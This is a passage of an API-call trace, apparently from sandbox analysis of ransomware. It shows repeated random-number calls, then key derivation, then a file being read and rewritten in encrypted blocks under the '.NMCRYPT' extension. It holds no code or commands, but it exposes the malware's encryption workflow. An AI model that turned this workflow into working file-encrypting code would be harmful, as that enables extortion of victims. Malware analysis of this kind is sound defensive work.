dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.746] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.747] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.748] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.748] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0160.748] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0160.749] CryptCreateHash (in: hProv=0x8e32a8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444794 | out: phHash=0x1d444794) returned 1 [0160.749] CryptHashData (hHash=0x9ad378, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0160.749] CryptDeriveKey (in: hProv=0x8e32a8, Algid=0x6610, hBaseData=0x9ad378, dwFlags=0x4, phKey=0x1d444798 | out: phKey=0x1d444798*=0x9ad438) returned 1 [0160.749] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0160.749] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0160.749] wcslen (_String="\\\\?\\") returned 0x4 [0160.749] CryptDuplicateKey (in: hKey=0x9ad438, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad278) returned 1 [0160.749] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS\\tipresx.dll.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sr-latn-cs\\tipresx.dll.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0160.750] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sr-latn-cs\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0160.750] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=8704) returned 1 [0160.750] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0160.750] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.751] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.751] GetLastError () returned 0x0 [0160.751] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.753] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.753] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.753] GetLastError () returned 0x0 [0160.753] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.753] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.753] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.753] GetLastError () returned 0x0 [0160.754] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.754] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.754] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.754] GetLastError () returned 0x0 [0160.754] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 